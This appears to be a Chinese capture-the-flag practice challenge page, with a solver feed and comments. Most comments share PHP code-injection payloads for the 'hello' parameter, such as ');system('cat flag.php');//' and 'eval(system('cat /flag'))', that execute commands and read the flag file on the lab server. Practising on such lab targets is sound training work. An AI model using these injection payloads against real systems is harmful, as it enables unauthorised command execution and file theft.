评分(10)
解题动态
徐日123 攻破了该题 52分钟前
九久 攻破了该题 1小时前
jwz 攻破了该题 3小时前
胡look 攻破了该题 4小时前
MAO 攻破了该题 16小时前
eee5588 攻破了该题 20小时前
zzasas 攻破了该题 21小时前
安藏七月 攻破了该题 22小时前
大宋iu后的 攻破了该题 23小时前
Rx 攻破了该题 1天前
浪鸭 攻破了该题 1天前
千万 攻破了该题 1天前
13246563665 攻破了该题 1天前
18369735915 攻破了该题 1天前
popidojdow 攻破了该题 1天前
GDGZ_CTF 攻破了该题 1天前
纳百川. 攻破了该题 1天前
link7788 攻破了该题 2天前
langzifun 攻破了该题 2天前
评论
我不打游戏的 18小时前
举报
想重练一下启动了没出现网站啊,搞诈骗啊???
detian1234 4天前
举报
网站直接运行你输入的内容,你输入指令让它打开存 flag 的文件,域名后面输入 /?hello=);show_source('flag.php');//
kris6 6天前
举报
?hello=eval(system(%27cat%20/flag%27))
wyz 23天前
举报
构造?hello=);system('cat flag.php');//,直接抓包,就找到flag
b2026tf 24天前
举报
http://171.80.2.169:17829/?hello=eval(system(%27cat%20/flag%27))
syhaisy 1月前
举报
GET /?hello=system('cat+flag.php') HTTP/1.1
FTJJJ 1月前
举报
?hello=eval(system('cat flag.php|grep {'))
kitniu 1月前
举报
file()是 " 的HTML 实体编码,是 PHP 内置的文件系统函数,核心功能是将整个文件按行读入一个字符串数组,每行(含换行符)为一个数组元素。 http://171.80.2.169:10115/?hello=file(%27flag.php%27)
qth18700737704 2月前
举报
?hello=eval(system(%27cat%20/flag%27))
19153693078 2月前
举报
根据代码php文件中包含flag.php 将传值hello得结果赋值给a,输出a得值,?hello=1 输出int 1,尝试将结果换成flag.php输出string(8) "flag.php",格式还是有问题的,考虑其是php文件,尝试?hello=file("flag.php"),得到文件中内容